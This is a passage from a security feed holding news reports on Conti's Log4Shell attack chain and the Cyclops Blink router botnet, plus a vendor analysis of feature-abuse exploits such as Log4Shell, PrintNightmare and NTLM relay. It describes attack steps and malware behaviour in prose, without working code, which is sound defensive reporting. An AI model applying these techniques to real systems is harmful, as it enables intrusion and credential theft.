vCenter.\n\n## Attack Chain\n\nStepping through that attack chain:\n\n 1. **Emotet** is a botnet that resurfaced last month on the back of TrickBot, now with the ability to directly install \u2026\n 2. [**Cobalt Strike**](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), the legitimate, commercially available tool used by network penetration testers on infected devices and pervasively adopted by cybercriminals. It gives threat actors direct access to targets and, according to Boguslavskiy, precedes\u2026\n 3. **Human Exploitation**, which describes the stage of an attack in which threat actors personally investigate the network, looking for critical data, analyzing the network structure, defining the most important network shares, and looking at ways to elevate privileges, among other things. That poking around is followed by \u2026\n 4. **Missing ADMIN$ share. **Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. As [Microsoft](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/problems-administrative-shares-missing>) puts it, \u201cMissing administrative shares typically indicate that the computer in question has been compromised by malicious software.\u201d Next up comes \u2026\n 5. **Kerberoast. **Kerberoasting, a common, pervasive attack that exploits a combination of weak encryption and poor service account password hygiene, is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. With regards to the final link in the attack chain, the Conti gang last week zeroed in on \u2026\n 6. **VMWare vCenter servers.** As of Wednesday, Dec. 15, Conti was looking for vulnerable VMWare networks for initial access and lateral movement. The VMWare servers are on a dismayingly [long list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of affected components and vendors whose products have been found to be vulnerable to Log4Shell.\n\nWithin two days of the public disclosure of the vulnerability in Apache\u2019s Log4j logging library on Dec. 10 \u2013 a bug that came under attack within hours \u2013 Conti group members were discussing how to exploit it as an initial attack vector, according to AdvIntel.\n\nApache patched the bug on Dec. 11, but its patch, Log4J2, [was found to be incomplete](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) in certain non-default configurations and paved the way for denial-of-service (DoS) attacks in certain scenarios.\n\nAs if two bugs aren\u2019t enough, yet another, similar but distinct bug was [discovered](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>) last week in the Log4J logging library. Apache issued a patch on Friday.\n\n## Conti Winds Up Its Exploit Machine\n\nAccording to the Thursday AdvIntel writeup, from Vitali Kremez and Yelisey Boguslavskiy, multiple Conti group members on Dec. 12 began to chat about exploiting the Log4Shell vulnerability as an initial attack vector. That led to scanning for vulnerable systems that AdvIntel first tracked the next day, on Dec. 13.\n\n\u201cThis is the first time this vulnerability entered the radar of a major ransomware group,\u201d according to the writeup. The emphasis is on \u201cmajor,\u201d given that the first ransomware group to target Log4Shell was a ransomware newcomer named[ Khonsari](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). As Microsoft has [reported](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#Minecraft>), Khonsari was locking up Minecraft players via unofficial servers. First spotted by [Bitdefender](<https://www.bleepingcomputer.com/news/security/new-ransomware-now-being-deployed-in-log4shell-attacks/>) in Log4Shell attacks, the ransomware\u2019s demand note[ lacked a way to contact](<https://www.bleepingcomputer.com/news/security/microsoft-khonsari-ransomware-hits-self-hosted-minecraft-servers/>) the operators to pay a ransom. That means that Khonsari is more of a wiper, meant to troll Minecraft users by taking down their servers, rather than ransomware.\n\nKhonsari ransomware was just one malware that\u2019s been thrown at vulnerable servers over the course of the Log4j saga. Within hours of public disclosure of the flaw, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT). reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\n## A Perfect Storm\n\nLog4Shell has become a focal point for threat actors, including suspected nation state actors who\u2019ve been observed investigating Log4j2, AdvIntel researchers noted. The compressed timeline of the public disclosure followed fast by threat actor interest and exploits exemplifies the accelerated trajectory of threats witnessed since the [ProxLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) family of bugs in Exchange Server in March and the subsequent attacks, they said: \u201cif one day a major CVE is spotted by APTs, the next week it is weaponized by ransomware,\u201d according to their writeup.\n\nBut out of all the threat actors, Conti \u201cplays a special role in today\u2019s threat landscape, primarily due to its scale,\u201d they explained. It\u2019s a highly sophisticated organization, comprising several teams. AdvIntel estimates that, based on scrutiny of Conti\u2019s logs, the Russian-speaking gang made over $150 million over the past six months.\n\nBut still they continue to expand, with Conti continually looking for new attack surfaces and methods.\n\nAdvIntel listed a number of Conti\u2019s innovations since August, including:\n\n * [Secret backdoors](<https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent>): Conti\u2019s Atera Agent allows the gang to gain persistence on infected protected environments: especially those equipped with more aggressive machine learning endpoint detention and response anti-virus productions. \u201cThe IT management solution enables monitoring, management and automation of hundreds of SMB IT networks from a single console,\u201d AdvIntel described in an August report.\n * New[ backup removal](<https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love>) solutions that expanded Conti\u2019s ability to [blow up backups](<https://threatpost.com/conti-ransomware-backups/175114/>).\n * An entire operation to revive[ Emotet](<https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware>), which [resurfaced](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) in November.\n\nThe writeup shared a timeline of Conti\u2019s search for new attack vectors, shown below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/20163220/conti_timeline-e1640035956574.jpg>)\n\nTimeline of Conti\u2019s search for new attack vectors. Source: AdvIntel.\n\n## Keeping Your Head Above the Logjam\u2019s Water\n\nAdvIntel shared these suggested recommendations and mitigations for Log4Shell:\n\n * The Dutch National Cyber Security Center shared a list of the affected software and recommendations linked to each one of them [on GitHub](<https://github.com/NCSC-NL/log4shell/tree/main/software>).\n * Here are [VMWare\u2019s workaround instructions](<https://kb.vmware.com/s/article/87081>) to address CVE-2021-44228 in vCenter Server and vCenter Cloud Gateway (87081).\n\n## When Will It All End?\n\nLou Steinberg, former chief technology officer at TD Ameritrade, said it ain\u2019t over til it\u2019s over, \u201cAnd it\u2019s not over.\u201d\n\n\u201cWe don\u2019t know if we patched systems after they were compromised from Log4J, so it may be a while before we know how bad things are,\u201d he said in an article shared with Threatpost on Monday. \u201cThis will happen again. Modern software and systems are built from components which aren\u2019t always trustworthy. Worse, bad actors know this and look to subvert the components to create a way into otherwise trusted software.\u201d\n\n122121 10:25 Added more attack chain details provided by AdvIntel.\n\n122121 13:00 Removed brute-force from the attack chain, given that, as AdvIntel explained, the brute-forcing of encrypted hashes carried out in these attacks is a different kind of brute-forcing than the typical definition of trying numerous credentials.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T22:11:30", "type": "threatpost", "title": "Conti Ransomware Gang Has Full Log4Shell Attack Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T22:11:30", "id": "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "href": "https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T17:24:48", "description": "The modular botnet known as Cyclops Blink, linked to the same advanced persistent threat (APT) behind the [NotPetya wiper attacks](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), is expanding its device targeting to include ASUS routers.\n\nFurther, it\u2019s likely that the botnet\u2019s purpose is far more sinister than the average [Mirai-knockoff\u2019s penchant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) for distributed denial-of-service (DDoS) attacks.\n\nThat\u2019s the word from Trend Micro researchers, who noted that Cyclops Blink casts a wide net in terms of the owners of the devices it chooses to infect, with no specific focus on high-value government or diplomatic entities. While that\u2019s out of step with typical APT behavior, researchers said that it\u2019s likely the botnet will be used as persistent infrastructure for mounting further attacks on high-value targets, and as such, should be indiscriminately distributed for maximum effect.\n\n\u201cIt should be noted that these victims do not appear to be evidently valuable targets for either economic, military or political espionage,\u201d according to the firm\u2019s analysis. \u201cFor example, some of the live command-and-control servers (C2s) are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States.\u201d\n\nCyclops Blink itself has been around since 2019, initially looking to infect WatchGuard Firebox devices according to a [February analysis (PDF)](<https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf>) performed by the UK\u2019s National Cyber Security Centre (NCSC). Now, to further its goal of widescale infections, ASUS routers are now on the menu, Trend Micro noted, with the latest variant incorporating a fresh module tailored to the vendor\u2019s devices.\n\n\u201cOur research was carried out on the RT-AC68U, but other ASUS routers such as RT-AC56U might be affected as well,\u201d researchers said. \u201cOur investigation shows that there are more than 200 Cyclops Blink victims around the world. Typical countries of infected WatchGuard devices and ASUS routers are the United States, India, Italy, Canada and a long list of other countries, including Russia.\u201d\n\n## **A Sinister Purpose?**\n\nCyclops Blink is the handiwork of the Russian-speaking Sandworm APT (a.k.a. Voodoo Bear or TeleBots), according to Trend Micro \u2013 the same group that\u2019s been [linked to a host of](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) very high-profile state-sponsored attacks, as well as the VPNFilter internet-of-things (IoT) botnet.\n\n\u201cSandworm was also responsible for\u2026the [2015 and 2016 attacks on the Ukrainian electrical grid](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), the 2017 NotPetya attack, the 2017 French presidential campaign, the [2018 Olympic Destroyer attack](<https://threatpost.com/olympic-destroyer-malware-behind-winter-olympics-cyberattack-researchers-say/129918/>) on the Winter Olympic Games and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW),\u201d researchers noted in a [Thursday analysis](<https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html>).\n\nInternet routers have been a favorite target for building out botnets for many years, thanks to \u201cinfrequency of patching, the lack of security software and the limited visibility of defenders\u201d when it comes to these devices, as Trend Micro put it. More often than not, such botnets are used to carry out DDoS attacks; but in Cyclops Blink\u2019s case, the motives are less obvious.\n\n\u201cThe purpose of this botnet is still unclear: Whether it is intended to be used for DDoS attacks, espionage or proxy networks remains to be seen,\u201d researchers said. \u201cBut what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.\u201d\n\nIn fact, some of the infected devices that researchers observed have been compromised for more than two and a half years, with some set up as stable C2 servers for other bots.\n\nIt is thus likely, the researchers speculated, that Cyclops Blink is destined for bigger horizons than denial of service.\n\n\u201cThe more routers are compromised, the more sources of powerful data collection \u2014 and avenues for further attacks \u2014 become available to attackers,\u201d according to the analysis, which raised the specter of \u201ceternal botnets.\u201d\n\n\u201cOnce an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying or anything else that the attacker wants to do,\u201d researchers warned. \u201cThe underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.\u201d\n\nGiven Sandworm\u2019s track record, it\u2019s wise to expect the worst, the firm noted.\n\n\u201cSandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best,\u201d researchers said.\n\n## **A Few Technical Specifics on a New Botnet Variant**\n\nCoded in the C language, Cyclops Blink relies on hard-coded TCP ports to communicate with a range of command-and-control servers (C2s), according to the analysis. For each port, it creates a rule in the Netfilter Linux kernel firewall to allow output communication to it.\n\nOnce it\u2019s made contact, the malware initializes an OpenSSL library, and its core component then cranks up operations for a series of hard-coded modules.\n\n\u201cCommunication with the modules is performed via pipes,\u201d according to Trend Micro. \u201cFor each hard-coded module, the malware creates two pipes before executing them in their own child processes.\u201d\n\nThe malware then pushes various parameters to the modules, which in turn respond with data that the core component encrypts with OpenSSL functions before sending it to the C2 server.\n\n\u201cThe data is encrypted using AES-256 in cipher block chaining (CBC) mode with a randomly generated 256-bit key and 128-bit initialization vector (IV). It is then encrypted using a hard-coded RSA-2560 (320-bit) public key unique to each sample,\u201d according to the analysis. \u201cThe C2 server must have the corresponding RSA private key to decrypt the data.\u201d\n\nResearchers added, \u201cTo send data to the C2 server, the core component performs a TLS handshake with a randomly chosen C2 server at a random TCP port, both of which are from a hard-coded list.\u201d\n\nInitially, the core component sends a list of supported commands to the C2 server and then waits to receive one of the commands back. These can be aimed at the core component itself or to one of its modules, according to the writeup.\n\nIf a command targets the core component, it can be one of the following:\n\n * Terminate the program\n * Bypass the data-sending interval and send data to C2 servers immediately\n * Add a new C2 server to the list in memory\n * Set time to send the next packet to the C2 server\n * Set time to send the next packet to the C2 server\n * Add a new module (an ELF file should be received following the command)\n * Reload the malware\n * Set the local IP address parameter\n * Set a new worker ID\n * Set an unknown byte value\n * Resend configuration to all running modules\n\nAs for the commands meant for the modules, the latest variant studied by Trend Micro now includes \u201cAsus (0x38),\u201d meant to activate a brand-new module built to infect ASUS routers.\n\n**Targeting ASUS Routers**\n\nThe ASUS module is built to access and replace a router\u2019s flash memory, thus enslaving it to the botnet, researchers explained.\n\n\u201cThis module can read and write from the devices\u2019 flash memory,\u201d they said. \u201cThe flash memory is used by these devices to store the operating system, configuration and all files from the file system.\u201d\n\nCyclops Blink reads 80 bytes from the flash memory, writes it to the main pipe, and then waits for a command with the data needed to replace the content.\n\n\u201cAs the flash memory content is permanent, this module can be used to establish persistence and survive factory resets,\u201d researchers explained.\n\nA second module, straightforwardly called \u201csystem reconnaissance (0x08),\u201d is responsible for gathering various data from the infected device and sending it to the C2 server.\n\nSpecifically, it harvests:\n\n * The Linux version of the device\n * Information about the device\u2019s memory consumption\n * The SSD storage information\n * The content of the following files: \n * /etc/passwd\n * /etc/group\n * /proc/mounts\n * /proc/partitions\n * Information about network interfaces\n\nA third module, \u201cfile download (0x0f),\u201d can download files from the internet using DNS over HTTPS (DoH).\n\nTrend Micro noted that ASUS is likely not the only new module that will emerge for the botnet. After all, Sandworm\u2019s previous botnet, VPNFilter, targeted a wide range of router vendors, including ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL and ZDE.\n\n\u201cWe have evidence that other routers are affected too, but as of reporting, we were not able to collect Cyclops Blink malware samples for routers other than WatchGuard and ASUS,\u201d according to the analysis. \u201cBased on our observation, we strongly believe that there are more targeted devices from other vendors. This malware is modular in nature, and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.\u201d\n\n## **How to Defend Against Becoming a Botnet Victim**\n\nLike with other botnets, organizations can protect themselves from Cyclops Blink attacks by falling back on basic security hygiene, Trend Micro noted, including the use of strong passwords, using a virtual private network (VPN), regular firmware patching and so on. Most successful compromises are the result of default or weak password use or the exploitation of known vulnerabilities.\n\nIf an organization\u2019s devices have been infected with Cyclops Blink, researchers said that the best course of action is to chuck the victimized router for a new one, given the malware\u2019s prodigious persistence capabilities.\n\n\u201cIt is best to get a new router,\u201d they explained. \u201cPerforming a factory reset might blank out an organization\u2019s configuration, but not the underlying operating system that the attackers have modified. If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible. However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor. In such cases, an average user would not have the ability to fix a Cyclops Blink infection.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T17:17:17", "type": "threatpost", "title": "Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T17:17:17", "id": "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "href": "https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-01-24T00:00:00", "description": "# Beyond Memory Corruption Vulnerabilities \u2013 A Security Extinction and Future of Exploitation\n\nBy Chintan Shah \u00b7 January 24, 2022\n\nModern exploitation techniques have changed how adversaries execute their attack strategies and how defenders analyze paths from vulnerability to exploitation. Over the past decade, we have seen rock solid focus on hardening security at both the overall Operating System and applications, which has resulted in remarkable progress being made on introducing several exploit mitigations. This progress has been gradually eliminating entire classes of memory corruption vulnerabilities in some cases. The Use-after-free (UAF) is a class of vulnerabilities, for example, which is very common in large complex code bases such as web browsers. Due to ease of exploitation, Microsoft introduced an isolated heap and delayed free of objects in its browser engine (mshtml.dll), breaking the UAF exploitation chain and making adversaries to address those barriers requiring them to re-engineer the exploits. Figure 1 below shows the part of the code where it was introduced to mitigate UAF vulnerabilities. \n\n **Figure 1 \u2013 mshtml introduction of the isolated heap to raise exploitation bar for UAF exploitation**\n\nWe can notice the different between the protected and unprotected code. While this was just the tip of the iceberg, it made exploiting UAF vulnerabilities extremely challenging since it required the attackers to address specific timing constraints and memory thresholds as well. Figure 2 below is the simple visualization of Windows OS memory exploit mitigations introduced over the past decade or so.\n\n **Figure 2 \u2013 Evolution of Windows OS exploit mitigations**\n\nHowever, time and again, we have seen these exploit mitigations being bypassed within a short period after they were introduced, primarily because either all the code including dependent, and third party code was not compatible with or not compiled with those mitigation switched on in the compiler. This essentially meant that the exploit mitigation was not enforced on every part of the code, or the mitigation itself was not completely implemented, leaving multiple loopholes which in turn could be exploited . For instance, it can be noted from the above visualization that ASLR was not implemented in initially in its entirety but rather in stages, thereby leaving much of the code still vulnerable to bypasses.\n\n##### Memory Corruption vulnerabilities \u2013 Will it become a thing of the past? \n\nWhile memory corruption vulnerabilities continue to be the most widely reported class of bugs , converting them into full-fledged weaponized exploits has become a challenge over the recent years owing to the exploit mitigations introduced at the OS as well as the client side application (For e.g., scripting engines). Translating memory corruption vulnerabilities into full blown exploits leading into arbitrary code execution, requires bypassing multiple mitigations without triggering any endpoint security solution protection or detection. This now means significant invest in effort, time and cost is required by adversaries to research exploit mitigation bypasses. On several occasions, adversaries may also need to chain multiple vulnerabilities to be able execute a working exploit on the target system which also significantly increases the development cost , raising the bar of exploitation.\n\nWe believe that this exploitation mitigations evolution is going to be crucial in shaping the nature of vulnerability classes of interested to adversaries in the future. The question : \u201cWill memory corruption vulnerabilities become extinct ?\u201d is debatable and requires some introspection.\n\n##### Exploitation Strategies of the Future - What lies ahead? \n\nMemory corruption vulnerabilities will continue to exist in the applications as long as there is some code in the application that handles memory incorrectly, but the intensity and frequency of exploitation of this class of vulnerabilities will eventually fade out. We had witnessed multiple instances of exploitation techniques in the past where attackers achieved arbitrary memory Read/Write (R/W),by exploiting a memory corruption flaw and using that primitive to change certain flags or data in the application memory leading to code execution. These set of methods codenamed \u201cdata only attacks\u201d were relatively easier strategies seen in many exploits. Eventually randomizing certain critical data structures locations in memory reduced this nature of attacks over time. \n\nWith feature rich applications, attackers will always be on a lookout for the easier strategies to achieve code execution on the target system. There are always legacy systems around exposed to the internet which will offer the path of least resistance to the attackers since they lack the mitigations introduced. However, one of the ways forward in this direction is to abuse the feature or design flaws in the application or in the network protocol. If adversaries can determine the way to abuse the inherent design or feature of the target application, for instance, making the application or a service connect to the attacker controlled machine without orchestrating the memory explicitly, it becomes relatively easier to achieve remote code execution and at the same time, causing havoc on the target machine since the functionality of the arbitrary code executed by the exploited process is completely on the imagination of the attacker. Figure 3 below is a simplistic view on the progression of exploitation strategies over the last few years. \n\n **Figure 3 \u2013 Adversary exploitation strategy evolution**\n\nWe have witnessed data only attacks and abuse of application features/design flaws several times over the last few years. They offer multiple advantages over the traditional memory corruption exploits, and some of the reasons we believe this is going to be the exploitation strategy of the future are:\n\n * It has the potential to bypass exploit mitigations in place and hence adversaries do not have to engineer the exploit specifically to address those barriers. \n * Arbitrary code is executed with the privileges of the exploited process and hence helps elevate the privileges.\n * Exploits taking advantage of application\u2019s inbuilt feature or design flaws does not have to deal with the explicit memory manipulation and space constraints before the vulnerability is exploited. Consequently, getting rid of injecting the shellcodes in the memory and the older stack pivoting techniques. \n * Relatively easier to exploit with lesser development / maintenance cost and time to weaponize it. \n\nRetrospection of critical vulnerabilities over the last couple of quarters can give us the definite clue on how the future attacks will take shape. In the following sections, we take a look at some of the more recent high impact vulnerabilities and check how features or design flaws in the service or application were abused to achieve code execution or sensitive information leak with minimum resistance.\n\n##### CVE-2021-44228 \u2013 Apache Log4J2 Logging Library Vulnerability Leading to Remote Code Execution\n\nThis RCE vulnerability reported in Apache\u2019s Log4j Logging library is one of the most critical flaws reported in the recent years, allowing attackers to execute arbitrary code on the vulnerable server that uses Log4J logging library to log text messages. [In our previous blog](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/vulnerability-discovery-in-open-source-libraries-part-1-tools-of-the-trade/>), we discussed at great length on how open source softwares serves as the building blocks of modern software development and how critical it is to audit them as any vulnerability will have a significant impact on the product using it. \n\nThe vulnerability lies in the \u201c**Lookup**\u201d method of \u201c**jndimanager**\u201d class. When the JNDI URL is included in the request message parameter to be logged by log4j, the apache\\logging\\log4j\\core\\lookup\\JndiLookup.lookup () method is called with the JNDI URL which in turn calls the net\\JndiManager.lookup () method as shown in figure 3 below, leading to the initiation of the remote JNDI lookup to the attacker controlled server. This allows the attacker controlled server to send the malicious JNDI reference in the response leading to the execution of arbitrary code on the vulnerable server. \n\n **Figure 4 \u2013 JNDI lookup**\n\nThis RCE was made possible because Java implements a variety of JNDI ( Java Naming and Directory Services) service providers like LDAP, DNS, RMI and CORBA; loading remote classes was also possible, depending on the default system properties set.\n\n**CVE-2021-44228** is a classic example of feature exploitation. The feature abused here was the [lookup substitution](<https://logging.apache.org/log4j/2.x/manual/configuration.html#PropertySubstitution>) which supports [Lookups](<https://logging.apache.org/log4j/2.x/manual/lookups.html>). Lookups are way to add values to the log messages which are typically variable names resolved using a defined map or at the runtime via implemented interfaces like [StrSubstitutor](<https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrSubstitutor.html>) and [StrLookup](<https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrLookup.html>) classes. \n\nLog4j supports the property syntax \u201c${prefix:name}\u201d where prefix indicates the Log4j that the variable name should be evaluated in the specific context. JNDI context is built into Log4J as shown below.\n\n **Figure 5 \u2013 JNDI context**\n\n **Figure 6- JNDI lookup descripton**\n\nSince JNDI lookups was enabled by default in Log4J version 2.14.1 and prior (see figure 6 above), the library could identify the JNDI references passed as the parameter value in the HTTP request headers logged on the server , consequently allowing attackers to inject malicious JNDI references in the HTTP request parameters leading to remote Java code execution.\n\n##### CVE-2021-34527 \u2013 Windows Print Spooler Service Vulnerability Leading to Remote Code Execution\n\nPrivileged remote code execution vulnerability in spoolsv.exe i.e., PrintNightmare was another critical vulnerability reported last year and serves as good illustration of how a design flaw in the protocol can be abused to execute arbitrary code on the target machine without having to operate on the memory. \n\nThe vulnerability was exploited over Print System Remote Protocol ([MS-RPRN](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1>)) and Print System Asynchronous Remote ([MS-PAR](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/695e3f9a-f83f-479a-82d9-ba260497c2d0>)) protocol, by making RPC calls over SMB. The exploit takes advantage of a classic design flaw in the implementation of the print server component in the spooler service, when RPC requests are made to MS-RPRN and MS-PAR interfaces to install the printer drivers on the target system. Making the RPC call to [RpcAddPrinterDriverEx](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b>) (MS-RPRN Opnum 89) or [RpcAsyncAddPrinterDriver](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/5d864e3e-5d8b-4337-89ce-cb0258ab97cd>) (MS-PAR Opnum 39) requires a DRIVER_CONTAINER structure to be passed as an argument. \n\n **Figure 7 \u2013 DRIVER_CONTAINER structure**\n\nAs indicated in the above structure details, DRIVER_CONTAINER contains **pDriverPath** and **pConfigFile**, which are the full path of the filename containing the printer driver and configuration module respectively. Both **pDriverPath** and **pConfigFile** are checked for the UNC path to prevent arbitrary code from loading. \n\nThe design or logic flaw in the code here is that same UNC path check is not applied to **pDataFile**, which is the full path of the file containing printer data. An adversary could make multiple calls to **RpcAddPrinterDriverEx** with:\n\n 1. **pDataFile** as the UNC path of the malicious DLL accessible to the target machine which when successful will copy the malicious DLL to the target machine locally.\n 2. Same API with the copied file name assigned to the **pConfigFile** (this time the malicious DLL becomes the local path) , leading to loading of malicious code by print spooler service. \n **Figure 8 \u2013 Adversary calls to driver installation API RpcAddPrinterDriverEx**\n\n##### CVE-2021-36942 \u2013 LSA Spoofing Vulnerability in Windows Leading to Credential Leaks\n\nRPC over SMB had always been on the forefront of many exploitation methods. This vulnerability could be exploited by again abusing [MS-EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) protocol, which is used in windows to manage the files on the remote system and encrypted using [Encrypting File System](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/230807ac-20be-494f-86e3-4c8ac23ea584#gt_3bd30c20-9517-4030-a48c-380362e209a1>) ( EFS ). \n\nBy making specific RPC calls like [EfsRpcOpenFileRaw](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>) over LSARPC interface attacker can make one windows host authenticate to another server; essentially meaning that a target server can be made to authenticate to an adversary controlled server via NTLM authentication. More importantly, LSARPC can be issued using RPC calls without any prior authentication and if this target server is Active Directory (AD), then adversary can make AD connect to the arbitrary server using the machine account for NTLM authentication. This EFSRPC protocol can be abused to chain multiple vulnerabilities within the enterprise network to relay NTLM credentials to an attacker controlled server which could be used to perform lateral movement, eventually leading to complete domain compromise. \n\n **Figure 9 \u2013 Adversary making RPC call to EFSRPC interface**\n\nIf the adversary is controlling an IIS web server with the Active Directory Certificate Services ( AD CS ) feature installed and is configured to use NTLM over HTTP authentication, making an Active Directory authenticate to IIS will result into leaking the NTLM credentials to the adversary, resulting in complete domain compromise. While NTML relay attacks aren\u2019t new, it is recommended to use more secure authentication mechanism like Kerberos to prevent protocol abuse like this.\n\n **Figure 10 \u2013 Authentication providers in IIS web server**\n\nIn summary, being able to abuse a protocol or a feature to make a critical asset connect to an externally owned adversary server comes with a dangerous consequence as demonstrated by the CVE-2021-44228 Log4J vulnerability.\n\n##### CVE-2021-40444 \u2013 Windows MSHTML Vulnerability Leading to Remote Code Execution\n\nThis was yet another critical vulnerability exploited last year and is a great example of how a simple feature abuse can be chained with a logic flaw to achieve arbitrary code execution. First, Object Linking and Embedding (OLE) was used to link the document to the external OLE object. Historically, OLE has played a significant role in building weaponized office exploits and this will continue to happen as it is one of the core features of MS-Office file format designed specifically to address interoperability. \n\n[MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) allows a document to embed or link to internal or external objects and in particular link to the external OLE object is specified via relationships . As shown in the crafted exploit 